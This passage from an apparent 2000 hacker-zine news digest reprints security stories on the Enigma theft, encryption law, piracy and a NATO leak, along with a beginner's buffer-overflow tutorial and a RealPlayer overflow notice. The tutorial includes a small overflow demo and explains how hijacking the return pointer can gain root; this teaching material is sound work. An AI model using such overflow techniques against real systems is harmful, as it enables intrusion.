inform them of the time the error occurred, and anything you might
have done that may have caused the error.
More information about this error may be available in the server
error log.
(sourbutts? LOL - Ed)
@HWA
205.0 HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Thursday 6 April 2000 on 1:57 PM
A 50-year-old man has been released on police bail after being
questioned by detectives investigating the disappearance of the Enigma
encoding machine.
Link: BBC
____________________________________________________
http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm
----------
Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK Man released after code
machine theft
Bletchley Park: Centre for wartime code-breaking effort
A 50-year-old man has been released on police bail after being questioned
by detectives investigating the disappearance of the Enigma encoding
machine. The man, from Bedfordshire, was arrested on Tuesday and
released after questioning at Milton Keynes police station.
Police have mounted a massive search for the historic machine, which
cracked the Nazi Enigma code during the Second World War.
It was stolen in broad daylight from a glass cabinet at the Bletchley Park
museum on Saturday, where it was on display.
Police officers were preparing to trawl a lake on the estate and search
the mansion.
Thames Valley Police spokesman John Brett said: "A search of the mansion
and the grounds of Bletchley Park will start under the supervision of a
police search adviser and a team of 10 police officers.
The missing Enigma machine
"There is a possibility that a Thames Valley Police underwater search unit
may be used to search the lake in Bletchley Park.
"It could be hidden under the stairs in the mansion, there are lots of
places it could be."
Detectives think the thief could have abandoned the Enigma machine within
the 50-acre grounds of the estate, or in one of the 70 rooms in the
mansion.
The museum in Milton Keynes, Buckinghamshire, was raided in full view of
visitors during an open day on Saturday.
The Enigma - one of only three in the world - is worth up to �100,000 and
was used by the Germans to encrypt messages sent during the Second World
War.
Bletchley Park is believed to have shortened the war by cracking the code.
Detectives were appealing for any visitors on Saturday who took pictures
or video footage to contact police in the hope they might identify the
thief.
Reward offered
Mr Brett urged whoever stole the machine not to be tempted to destroy the
evidence in the light of massive publicity.
He added: "If it's a prank that's gone wrong, don't destroy it because our
main priority is getting it back."
A �5,000 reward is being offered by BT, owners of part of the site in
Milton Keynes since World War II.
"It is a tragedy that the machine has been stolen," Alan White, director
of BT's property division, said.
@HWA
206.0 HNS:Apr 6th:CYBERPATROL BLOCK LIST
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Thursday 6 April 2000 on 1:36 PM
Our affiliates at Security Watch wrote that a list of thousands of
hosts, websites and Usenet groups blocked by Microsystems Software
Inc.'s CyberPatrol software has been published on the web.
Link: Security Watch
____________________________________________________
http://www.securitywatch.com/scripts/news/list.asp?AID
----------
@HWA
207.0 HNS:Apr 5th:CRYPTO REGULATIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Wednesday 5 April 2000 on 12:27 PM
Privacy advocates won a preliminary victory when for the second time a
federal appeals court questioned restrictions on data-scrambling
encryption software.
Link: Wired
____________________________________________________
http://www.wired.com/news/politics/0,1283,35425,00.html
----------
Crypto Regs Challenged Again by Declan McCullagh 4:00 p.m. Apr. 4, 2000
PDT Privacy advocates won a preliminary victory when for the second time a
federal appeals court questioned restrictions on data-scrambling
encryption software.
The Sixth Circuit Court of Appeals suggested Monday that President
Clinton's restrictions on distributing encryption products might be
unconstitutional.
"Because computer source code is an expressive means for the exchange of
information and ideas about computer programming, we hold that it is
protected by the First Amendment," a three-judge panel said in a unanimous
17KB decision.
That decision reversed a July 1998 ruling by a federal district court.
And while the panel did not strike down the Clinton administration's
regulations, it did refer the matter back to U.S. District Judge James
Gwin for another hearing. Earlier Gwin had ruled the First Amendment did
not apply.
The Justice Department says source code is akin to instructions for a
machine, and rules governing its distribution are necessary for national
security reasons.
Now that the appeals court has ruled source code is protected by the First
Amendment, the government will have a much tougher time arguing it should
have the power to imprison a law professor for posting a book on his
website.
Peter Junger, a professor at Case Western University School of Law, sued
the federal government after it told him he needed a license to post a
chapter of his Computers and the Law textbook online.
The American Civil Liberties Union, which represents Junger, applauded the
ruling.
"This is a great day for programmers, computer scientists and all
Americans who believe that privacy and intellectual freedom should be free
from government control," said ACLU Legal Director Raymond Vasvari.
In a separate case that also challenges the criminal penalties the U.S.
government imposes for unauthorized encryption distribution, the 9th U.S.
Circuit Court of Appeals in May 1999 ruled that encryption source code was
speech protected by the First Amendment.
"We conclude that the challenged regulations allow the government to
restrain speech indefinitely with no clear criteria for review," the 9th
Circuit panel said in its decision in a case brought by math professor
Daniel Bernstein.
But it's not clear what happens next in either the Junger or Bernstein
cases. The Clinton administration relaxed the regulations in January, and
the move is likely to delay both lawsuits for some time.
In fact, the Commerce Department, which administers the regulations, says
that Bernstein no longer has anything to worry about.
"You ask for an advisory opinion in light of your concern that the new
regulations 'continue to interfere with Professor Bernstein's planned
scientific activities.' Your concerns are unfounded," a Commerce
Department Bureau of Export Administration official wrote to Bernstein's
lawyers in February.
Bernstein asked in March for a rehearing by the district court to take
into account the regulation changes.
@HWA
208.0 HNS:Apr 5th:GFI AND NORMAN TEAM UP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Wednesday 5 April 2000 on 12:24 PM
GFI and Norman have teamed up to integrate the Norman Virus Engine
with GFI's e-mail security gateway, Mail essentials.
Link: ESJ
____________________________________________________
http://www.esj.com/breaknewsdisp.asp?ID
----------
@HWA
209.0 HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Wednesday 5 April 2000 on 12:23 PM
MasterCard has taken the unusual step of offering a free virus repair
service as a key feature in its small business card package.
Link: Computer Currents
____________________________________________________
http://www.currents.net/newstoday/00/04/05/news5.html
----------
Daily News MasterCard Offers Virus Repair Service By Steve Gold, Newsbytes
April 05, 2000
MasterCard has taken the unusual step of offering a free virus repair
service as a key feature in its small business card package.
The card issuer has tapped Vipro Corp., for the service, which is
available to all MasterCard Executive BusinessCard holders.
For those cardholders that require the service, MasterCard is offering
Vipro's Virus Service Plan (VSP), a normally paid-for facility, free of
charge to BusinessCard holder.
Vipro's Virus Service Plan is billed as providing computer users
"coverage" from destructive viruses. If a virus damages a plan holder's
computer, Vipro will repair it at no charge to the member.
The service, which is designed for consumers and small business owners,
includes a copy of Norton AntiVirus as standard, as well as online and
telephone technical support.
In the event that Norton AntiVirus and/or support from a telephone tech
support person cannot assist the user in getting his/her PC back up and
running, Vipro says it has a network of more than 7,000 local repair
centers available across the US.
Bernie Brenner, Vipro's president, said that small businesses are
extremely vulnerable to computer virus attacks. "As more businesses plug
into the Internet and conduct more of their day-to-day business
transactions online, the chance of a virus attack increases," he said.
Newsbytes notes that the MasterCard Virus Service Plan is included free as
a MasterCard Executive BusinessCard benefit and includes free virus repair
reimbursement, Web technical support, a three-month trial of Norton
Antivirus, telephone technical support, and access to the online virus
resource center.
MasterCard's Web site is at http://www.mastercard.com . Vipro's Web site
is at http://www.vipro.com .
Reported by Newsbytes.com
@HWA
210.0 HNS:Apr 5th:BUFFER OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Wednesday 5 April 2000 on 3:12 AM
A survey held amongst readers of the security/vulnerability report
list "Bugtraq" a few months ago approximately 2/3 of the respondents
thought the so-called "buffer overflows" to be the dominating security
problem. Read new Default article which deals with buffer overflows.
Link: Default
____________________________________________________
http://net-security.org/default/articles/09/02.shtml
----------
DEFAULT ARTICLES
Smashing the what??
An introduction to the memory buffers and a explanation of their possible
uses as weaknesses -- by Thejian
Introduction
A survey held amongst readers of the security/vulnerability report list
"Bugtraq" a few months ago approximately 2/3 of the respondents thought
the so-called "buffer overflows" to be the dominating security problem.
(http://immunix.org/SlackGuard/discex00.pdf) When you troll through the
messages and advisories on this same list, you indeed get the impression
this might not be to far from the truth since the lil' boogers are
mentioned everywhere. In the following article I'll try to explain a bit
more about the way memory is handled on a system and how these buffer
problems can be used to exploit it. Most of the various files floating
around out there however require quite a background in programming etc to
understand, I'll try to make this understandable even for those of you who
do not exactly meet that requirement (maybe particularly those of you). I
hope to make "simplify" not "dumbify" however, but still this is just a
basic approach, useful as an introduction to the more technical texts by
individuals as dr Mudge, Elias Levy (Aleph One) and many others (see
bibliography). So if you were born with pure ASM running through your
veins you might want to look elsewhere, if however you're just the average
enthusiast wanting to know what all those "elite" people are talking
about, do read on :)
What are these "buffers" you keep talking about?
A computer program basically is a set of instructions and requests. This
can easiest be illustrated in form of the famous "if-then-else" loop. An
instruction is run, resulting in variables which decide the course of the
program while the follow-up instructions are ran. A buffer (in
programming) is an area in the memory shared by different processes on the
system. Basically a buffer makes it possible to make different processes
run simultaneously without holding each other up or to hold data in a
place where it can be manipulated before its moved to a file. The program
also needs a way to "remember" how to follow-up when the current
instruction is done, what to do next. This is where the "Stack" comes in.
The what??
The Stack (or "push-down list") is a (dynamicly) growable area of the
memory where when a program is executed, it dumps its data (variables,
memory addresses etc), which gets manipulated by whatever rules and
algorithms are present/appliable and then continues. Then the "next to-do"
instruction is taken from the top of the Stack and executed. "From the
top" might give you the impression this process is defined by means of a
predestined orderly list of any kind. The way how this actually works
however, is that the last instruction passed on to the system to be
executed ends up on top of the stack, so you could say it works in a "last
in - first out" manner.
The top and bottom of the stack are defined by the Stack pointer (which
holds the memory address to where the top of the Stack can be found) and
the Base pointer (which obviously is the other one, pointing at the bottom
or base of the Stack). Contrary to what might seem logical, the number
associated with the memory addresses start at the bottom of the stack
(hence the "base") and start counting up. Because of this, generally
programs refer to the BP for the location of their data. This means the
start of an 10 character instruction is not called as SP + 1 but as BP -11
(or actually BP +11 because of the numbers counting up "backwards").
The Buffer Overflow
As said before, a buffer is an area shared by different processes.
Obviously there is a need for a certain flexibility here, to allow this
changing of different processes to actually happen and to allow it to be
called from different positions in the program. These buffers are subject
to certain rules though and overflowing them is nothing more than the word
says, breaking those rules by filling up a buffer by putting more in it
than fits in. (think of trying to hammer the triangle into the mold of a
circle :)
An example: (part of in the bibliography mentioned doc on the writing of
Buffer Overflows by dr. Mudge of L0pht Heavy Industries)
--------syslog_test_1.c------------ #include char buffer[4028]; void
main() { int i; for (i=0; i<=4028; i++) buffer[i]='A'; syslog(LOG_ERR,
buffer); } --------end syslog_test_1.c----------
What happens here is that the buffer, which is set to contain 4028
characters is filled with A's as long as the amount of A's is smaller than
or equals 4028. Obviously the set buffer size eventually is exceeded,
causing the buffer to "overflow". The system returns:
Program received signal 11, Segmentation fault
0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141)
or pops up something like the following:[ (when in Windows)
"The Instruction at '0x1273' referenced memory at '0x41414141'. The memory
could not be read."
Here the second line tells us a number of things as the location where it
crashed. The 41's you see are the hex equivallent for the ascii character
'A'.
Gee that's nice.. but what can I do with it?
Most network/server systems manage a variety of different accounts to keep
track of which user is where doing what and to make sure no user could
have access to things (be it files or processes/services) he or she
shouldn't have. Obviously the accounts with the higher privileges are the
ones the most interesting because they give access to and allow
manipulation/execution of a lot more things. What you'd want to do is to
exploit an Buffer Overflow in something (program/service/etc) ran by one
of these accounts, allowing you to change the position indicating the
"next-to-do" instruction and possibly allowing you to execute your own
code. By overwriting this pointer with (enough of) the value you use to
overflow the buffer, the program is redirected to (when using the A's
mentioned in the above example) address 0x41414141 and executing the
instructions it finds there. The beauty of this all is that these
instructions are run with the privileges of the account which process you
interrupted. This way you could pop up a command prompt as root or run
code you wrote/uploaded on another account with the privileges of the
administrator. Imagine the possibilities :) So as Mudge says, "put on
those warp refraction eye-goggles and on we go" !
The more technical side (or: Bibliography)
Now you have a bit of an understanding as to what buffer overflows
actually are and how they work, or at least so I hope. If you got the
taste for it now, or just want to experiment, you now might want to move
on to the next mentioned files:
"Smashing The Stack For Fun And Profit", Elias Levy(Aleph One)
http://www.phrack.com/search.phtml?view&article=p49-14
"How to write Buffer Overflows", dr. Mudge
ftp://ftp.technotronic.com/rfc/bufferoverflows.html
"The Tao of the Windows Buffer Overflow", Dildog
http://www.cultdeadcow.com/cDc_files/cDc-351/index.html
"Exploiting Windows NT4 Bufferoveruns; a case study: RASMAN.EXE", David
Litchfield
http://packetstorm.securify.com/9905-exploits/ntbufferoveruns.txt
"W00w00 on Heap Overflows", w00w00 security
http://packetstorm.securify.com/docs/infosec/buffer-overflows/w00w00-heap-
overflows.txt
@HWA
211.0 HNS:Apr 5th:PIRACY
~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by LogError
Wednesday 5 April 2000 on 12:11 AM
Washington state, with an economy that has boomed along with
Microsoft's, has launched a crackdown on state employees who illegally
circulate pirated software on government computers.
Link: APB News
____________________________________________________
http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html
----------
Microsoft's Home State Cracks Down on Piracy
Washington Governor's Order Targets Software Copying
April 4, 2000
By David Noack
OLYMPIA, Wash. (APBnews.com) -- Washington state, with an economy that has
boomed along with Microsoft's, has launched a crackdown on state employees
who illegally circulate pirated software on government computers.
Gov. Gary Locke signed an executive order Monday aimed at preventing the
illegal acquisition and distribution of programs using state equipment or
funds.
"We are working diligently to combat computer software piracy," Locke
said. "As a major purchaser and user of computer software, Washington
state government must set an example in acquiring and using legally
licensed software."
Washington now becomes the fourth state to issue strict policies and
guidelines dealing with software piracy in state government. The other
states are California, Nevada and Colorado.
The executive order
The executive order directs all state agencies to take the following
actions:
Adopt procedures to prevent the unlawful acquisition, reproduction,
distribution or transmission of computer software Establish procedures to
ensure that computer software use complies with the law Take appropriate
measures if contractors or financial assistance recipients use state funds
to acquire, operate or maintain illegal software. In addition to the
illegality of having pirated software, Locke also cited economic concerns
for issuing the order.
Estimates of 4,000 jobs lost
"Illegal software use has a very damaging impact on Washington's economy,"
Locke said. "We cannot tolerate counterfeiters who try to make a quick
buck by pawning illegal software to honest consumers at the expense of
Washington's taxpayers."
Computer industry estimates show pirated software costs Washington's
economy almost 4,000 jobs annually and more than $200 million in lost
wages.
The state is home to more than 7,000 high-technology businesses, including
software developers, software training groups, and software and hardware
service organizations. These businesses employ more than 76,000 people and
pay more than $3.7 billion in annual wages.
Computer trade associations such as the Software Information Industry
Association (SIIA) and the Business Software Alliance (BSA) have long
argued that software piracy costs the industry billions annually and have
called for more software auditing.
Peter Beruk, vice president of anti-piracy programs at the SIIA, said that
an executive order dealing with software piracy sends a message to the
state bureaucracy that this kind of behavior won't be tolerated.
"It helps having a governor issuing an executive order like this," Beruk
said. "It puts notice on people who are responsible for this to do the
right thing. It gives them, the people actually responsible for doing
this, ... an important job. The governor has directed us to do this."
Officials from the Microsoft Corp. and Adobe Systems Inc. were quick to
applaud the governor's actions to protect intellectual property rights in
Washington state.
On the federal level, President Clinton issued a national executive order
against software piracy in October 1998, and other countries around the
globe ranging from China to Norway to Colombia have issued such
intellectual property directives.
A leadership role
Locke will speak about the executive order today at a meeting of the
Government Leaders Conference, where, in an address on "Digital
Government," he will highlight why the protection of intellectual property
is important in today's economy.
"We're encouraged to see Washington continue to take a state leadership
role in addressing the issue of intellectual property rights, as both
consumers and governments move into the digital era where the online world
becomes the norm for business transactions," said Anne Murphy, corporate
attorney at Microsoft.
The head of Washington's software industry also backed the governor's
efforts to protect intellectual property.
"Much focus over the years has been about foreign software piracy,
obscuring the fact that piracy is a rampant domestic issue," said Kathleen
Wilcox, president and chief executive officer of the Washington Software
Alliance.
Approximately 20 percent of the software used in Washington -- one out of
every five copies -- has been illegally copied, according to a 1998 study
by International Planning & Research Corp.
Pirate targets
Experts said that governments are often targets for software pirates,
mainly due to the low-bid government procurement processes in place.
Because many illegitimate software manufacturers now advertise their
products over the Internet -- where it is more difficult for consumers to
distinguish genuine from illegal software -- it has become increasingly
easy for customers at all levels to be deceived into believing that they
are acquiring genuine software.
"Washington state residents clearly don't want their taxpayer dollars
going toward pirated software or the organized crime rings that could be
distributing it," Microsoft's Murphy said.
Last month, Colorado Gov. Bill Owens issued an executive order dealing
with the use of legal, licensed computer software throughout the state
government. The order applies to all state agencies, as well as all third
parties doing business with the state.
"Government agencies are among the largest users of computer software and
must set a positive example by mandating the use of legal and licensed
software," said Becca Gould, the Business Software Alliance's vice
president of public policy.
According to the Business Software Alliance, the use of illegal software
costs nearly $11 billion annually -- $2.8 billion in the United States
alone. In 1998, proliferation of illegal software in the United States
resulted in the loss of 109,000 jobs, $4.5 billion in wages and nearly
$991 million in tax revenue.
According to a recent industry study, the piracy rate in Colorado is 27
percent, resulting in lost jobs and tax revenues throughout the state.
David Noack is an APBnews.com staff writer (david.noack@apbnews.com)
@HWA
212.0 HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by LogError
Wednesday 5 April 2000 on 12:05 AM
Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has
been broken! This was the largest public calculation ever to use a
complex parallel algorithm. $5,000 dollars in winnings will be donated
to the Free Software Foundation.
Link: Slashdot
____________________________________________________
http://slashdot.org/article.pl?sid
----------
(article vanished or like has gone or some shit - Ed)
@HWA
213.0 HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by LogError
Wednesday 5 April 2000 on 12:02 AM
Continuing its California courtroom battle against the Digital Video
Disk industry over DVD encryption codes, the Electronic Frontier
Foundation has appealed an injunction granted against more than 50 Web
site operators in January.
Link: Computer User
____________________________________________________
http://www.currents.net/newstoday/00/04/04/news7.html
----------
@HWA
214.0 HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by LogError
Wednesday 5 April 2000 on 12:01 AM
The North Atlantic Treaty Organization has launched a full-scale
investigation into how one of its top-secret documents ended up posted
on the Internet. The Sunday Telegraph reports that an unknown virus is
to blame for the posting of the nine-page document, detailing the
alliance's rules of engagement in the southern Yugoslav province of
Kosovo, on to the Net.
Link: Computer User
____________________________________________________
http://www.currents.net/newstoday/00/04/04/news3.html
----------
Daily News Virus Blows a Hole in NATO's Security By Steve Gold, Newsbytes
April 04, 2000
The North Atlantic Treaty Organization (NATO) has launched a full-scale
investigation into how one of its top-secret documents ended up posted on
the Internet.
The Sunday Telegraph reports that an unknown virus is to blame for the
posting of the nine-page document, detailing the alliance's rules of
engagement in the southern Yugoslav province of Kosovo, on to the Net.
Press reports this morning say that NATO moved into full swing over the
weekend after the British Ministry of Defence was alerted to the problem
late last week.
The Sunday Telegraph said that the top secret document was spotted by a
London publishing house and reported to the relevant authority. BBC news
reports today, meanwhile, say that a virus may be to blame.
NATO's Brussels headquarters said that a press briefing for the media is
expected later today. The Sunday Telegraph, meanwhile, quotes Jamie Shea,
a senior spokesperson for NATO, as saying that, if the investigation shows
that a NATO document has got into the public domain, "it will be a matter
of great concern to us."
He added, "These are sensitive NATO documents. We would like to keep them
classified and prevent them being compromised."
Newsbytes' sources say that the document posted to the Net included NATO's
Rules of Engagement for Land Operations, which cover the circumstances
under which "appropriate measures, including the use of deadly force," may
be used.
The Sunday Telegraph quotes an unnamed person at the London Publishing
company as saying that two people tried to open up a new document on a PC
and, instead, the NATO Kosovo document started to scroll up.
"The next thing I knew, I was in a meeting around lunchtime when a message
came from reception saying, `Your guests have arrived.'"
On returning to work, the member of staff was interviewed by two military
intelligence officers in plain clothes, who said words to the effect of,
"'This is something we are very worried about,' and started to ask
questions."
Newsbytes' sources suggest that the NATO document was top secret
classified material, but the classification was changed to "restricted"
over the weekend to prevent further embarrassment.
Sources also suggest that the document was posted to a Usenet group, but
was quickly deleted by a Ministry of Defence autobot, a software agent
that autodeletes questionable Usenet postings from the servers of
Usenet-enabled Internet service providers (ISPs) around the world.
Graham Cluley, head of corporate communications with Sophos Anti- Virus,
was not surprised by the reports that a virus is to blame for the NATO
security breach.
He pointed to worm payloads such as the infamous Melissa virus as
indicative of how easy it is to trigger an Internet posting without the
permission of the host PC operator.
"These latest security breaches highlight that no one is immune to
security scares in any form," he said, adding that, if NATO can be hit by
a virus, "then it should serve as a salutary reminder to all of us that we
all need to be vigilant against computer crime and ensure the deployment
of quality, up-to-date anti-virus and encryption software.
"In this particular case, NATO has suffered an embarrassment, but viruses
like Melissa have already shown us how it is possible for a virus to pass
on confidential material to thousands via just a few hops in an e-mail
address book," he said.
"Perhaps more troubling though, is the fact that these viruses appear to
be causing much more serious harm than a virus whose payload is a playful
cartoon or Dr. Who quote," he added.
Sophos' Web site is at http://www.sophos.com .
Reported by Newsbytes.com
@HWA
215.0 HNS:Apr 4th:FIGHT SPAM WITH SPAM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Tuesday 4 April 2000 on 8:40 AM
Cisco Systems is urging victims of spam to take the law into their own
hands and deliver their own form of vengeance to combat unwanted
e-mails. This was taken from booklet 'The Easy Guide to Network
Security', which could be downloaded from their UK site.
Link: The Register
____________________________________________________
http://www.theregister.co.uk/000404-000001.html
----------
(Now this is a real dumb thing for a reputable company to suggest
... - Ed)
Posted 04/04/2000 7:02am by Tim Richardson
Cisco tells spam victims to reply with abusive emails
Cisco Systems is urging victims of spam to take the law into their own
hands and deliver their own form of vengeance to combat unwanted e-mails.
It claims the best way to deal with spammers is to reply with abusive
e-mails and to dump massive files that will clog up their servers.
It's the online equivalent to blowing a whistle down the phone line when
dealing with nuisance calls - or flicking the Vs at a motorist before
chasing them for five miles after they've carved you up.
The advice is contained in a booklet The Easy Guide to Network Security,
which is also published in an ungainly PDF file on Cisco's UK Web site.
Under the heading "Spam", it reads: "Spam is usually harmless, but it can
be a nuisance, taking up time and storage space. The solution is to flame
the perpetrators by sending them abusive messages, or to reply by dumping
a very large and useless file on their Web server."
It's not clear whether this is a corporate-wide policy or just applies to
the hard noses in Britain.
It's certainly a different approach from that pursued by British ISP,
BiblioTech, which goes to extreme lengths to chase spammers through the
courts.
Question is, have you received any spam from Cisco? If so, sounds like
they're inviting you to take action. And if you can orchestrate it with
other spam victims, then you could even manufacture a denial of service
attack. �
@HWA
216.0 HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ
Tuesday 4 April 2000 on 8:10 AM
There is a buffer overflow in the Win32 RealPlayer Basic client,
versions 6 and 7. This appears to occur when >299 characters are
entered as a 'location' to play, such as http://aaaaa..... with 300
a's. If it is embed in an html page Internet Explorer alos crashes.
Link: Bugware
____________________________________________________
299 characters are entered as a 'location' to play, such as
http://aaaaa..... with 300 a's. If it is embed in an html page
Internet Explorer alos crashes.
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,3289
8,
----------
@HWA
217.0 ISN:Mar 18th:Serbs hacked Britain's top-secret military computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: William Knowles <wk@c4i.org>
Sounds like complete FUD to me, But I wouldn't put it past any country
nowadays. -WK
http://express.lineone.net/express/00/02/27/news/n0220serb-d.html
By Ken Hyder and Nick Anning
Serb experts hacked into Britain's top-secret military computer systems
during the Kosovo conflict last year, the Sunday Express has learned.
In response, MI5 has been put in charge of improving Britain's defences
against cyber attack. It is understood that both sides engaged in covert
cyber war alongside the conventional warfare and that British agents
successfully hacked into Serb computers.
Both sides tried to plant computer viruses into military systems. The Serb
attacks focused on computers handling the messaging systems used by the
Ministry of Defence to communicate between headquarters in the UK and
military units in the field.
The cyber strike persuaded the Government that an all-out attack on our
computer systems could bring the country to a standstill.
Working alongside MI5 are computer experts from GCHQ in Cheltenham,
specialist army units such as the SAS, and highly experienced private
sector consultants. The police National Crime Squad will also be involved.
A source admitted: "This kind of warfare is a deadly innovation. One
super-hacker with just a laptop and mobile phone could wreak an amazing
amount of damage in minutes. There are so many targets for us to defend -
but the enemy hacker just needs to pick one and succeed."The SAS has
carried out dummy attacks on key installations such as the National Grid
and air-traffic control. Now, as well as testing out a location's physical
defences, they take a civilian computer specialist with them.
ISN is sponsored by Security-Focus.COM
@HWA
218.0 March 15th: CRYPTOGRAM newsletter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Bruce Schneier <schneier@counterpane.com>
CRYPTO-GRAM
March 15, 2000
by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on computer security and cryptography.
Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.
Copyright (c) 2000 by Counterpane Internet Security, Inc.
** *** ***** ******* *********** *************
In this issue:
Kerberos and Windows 2000
Counterpane -- Featured Research
News
AES News
Counterpane Internet Security News
Software as a Burglary Tool
The Doghouse: The Virginia Legislature
Software Complexity and Security
Comments from Readers
** *** ***** ******* *********** *************
Kerberos and Windows 2000
Kerberos is a symmetric-key authentication scheme. It was developed at MIT
as part of their Project Athena in the 1980s -- the protocol was published
in October 1988 -- and has been implemented on various flavors of
UNIX. The current version is Kerberos Version 5, which corrected some
security vulnerabilities in Version 4. It's never taken over the
authentication world, but it is used in many networks. These days, the
Internet Engineering Task Force (IETF) controls the specification for Kerberos.
Kerberos is a client-server authentication protocol. (_Applied
Cryptography_ goes into the protocol in detail.) For the point of this
article, remember that there is a secure Kerberos server on a
network. Clients log into the Kerberos server and get secure
"tickets." The clients can use these tickets to log onto other servers on
the network: file servers, databases, etc.
Kerberos is now part of Microsoft Windows 2000, sort of. The issue is that
Microsoft has made changes to the protocol to make it noninteroperable with
the Kerberos standard, and with any products that implement Kerberos correctly.
Specifically, the incompatibility has to do with something called the "data
authorization field" in the Kerberos messages. All major Kerberos
implementations leave the field blank. The new Microsoft implementation
does not; it uses the field to exchange access privileges between the
Kerberos server and the client.
There are two ways to look at this:
o Since the field has no specific uses in the protocol (and no one else
uses it), the fact that Microsoft is using the protocol is harmless.
o Because Microsoft is refusing to publish details about its proprietary
use of the field, they are harming interoperability and
standardization. Other Kerberos vendors cannot directly support Windows
2000 clients.
Even worse, Microsoft bypassed the IETF in this process (there's a
procedure you're supposed follow if you want to enhance, deviate from, or
modify an IETF standard).
On the surface, this is just nasty business practices. If you're a company
that has invested in a UNIX-based Kerberos authentication system and you
want to support Windows 2000 desktops, your only real option is to buy a
Windows 2000 Kerberos server and pay for the integration. I'm sure this is
what Microsoft wants.
My worry is more about the security. Protocols are very fragile; we've
learned that time and time again. You can't just make changes to a
security protocol and assume the changed protocol will be
secure. Microsoft has taken the Kerberos protocol -- a published protocol
that has gone through over a decade of peer review -- and has made changes
in it that affect security. Even worse, they have made those changes in
secret and have not released the details to the world.
Don't be fooled. The Kerberos in Windows 2000 is not Kerberos. It does
not conform to the Kerberos standard. It is Kerberos-like, but we don't
know how secure it is.
Kerberos Web page:
<http://www.isi.edu/gost/gost-group/products/kerberos/>
IETF Specification:
<ftp://ftp.isi.edu/in-notes/rfc1510.txt>
<ftp://athena-dist.mit.edu/pub/kerberos/doc/techplan.txt>
Microsoft Kerberos information:
Windows 2000 Kerberos Authentication white paper --
<http://www.microsoft.com/windows2000/library/howitworks/security/kerberos.asp>
Introduction to Windows 2000 Security Services --
<http://www.microsoft.com/WINDOWS2000/guide/server/features/secintro.asp>
Guide to Kerberos Interoperability --
<http://www.microsoft.com/windows2000/library/planning/security/kerbsteps.asp>
Article by David Chappell about Kerberos and Windows 2000 --
<http://www.microsoft.com/msj/defaulttop.asp?page=/msj/0899/kerberos/kerbero
stop.htm>
** *** ***** ******* *********** *************
Counterpane -- Featured Research
"A Performance Comparison of the Five AES Finalists"
B. Schneier and D. Whiting, Third AES Candidate Conference, 2000, to appear.
In 1997, NIST announced a program to develop and choose an Advanced
Encryption Standard (AES) to replace the aging Data Encryption Standard
(DES). NIST chose five finalists in 1999. We compare the performance of
the five AES finalists on a variety of common software platforms: current
32-bit CPUs (both large microprocessors and smaller, smart card and
embedded microprocessors) and high-end 64-bit CPUs. Our intent is to show
roughly how the algorithms' speeds compare across a variety of CPUs. Then,
we give the maximum rounds cryptanalyzed for each of the algorithms, and
re-examine all the performance numbers for these variants. We then compare
the algorithms again, using the minimal secure variants as a way to more
fairly align the security of the five algorithms.
<http://www.counterpane.com/aes-comparison.html>
** *** ***** ******* *********** *************
News
More commentary on the ethics of publicizing vulnerabilities:
<http://boardwatch.internet.com/mag/99/oct/bwm62.html>
<http://cgi.zdnet.com/slink?22157:8469234>
An opinion on DDS attacks and the CD Universe fiasco:
<http://www.osopinion.com/Opinions/GaryMurphy/GaryMurphy7.html>
There's a new DSS standard:
Text --
<http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=2000_register&doc
id=00-3450-filed>
PDF --
<http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=2000_register&doc
id=00-3450-filed.pdf>
BAIT, DIRT, and other law-enforcement hacker tools. Some of the PR fluff
sounds too good to be true.
<http://www.codexdatasystems.com/>
H&R Block insecurity:
<http://news.cnet.com/news/0-1005-200-1550948.html?tag=st.ne.1002.tgif?st.ne
fd.gif.d>
The worst security product is the one that isn't used. Here are the
results of a PGP usability study. Most people can't figure out how to use
it. Some sent e-mail out unencrypted, believing it was secure.
<http://www.wired.com/news/news/business/story/21484.html>
<http://www.cs.cmu.edu/~alma/johnny.pdf>
Novell published a "security flaw in MS Active Directory Services" the day
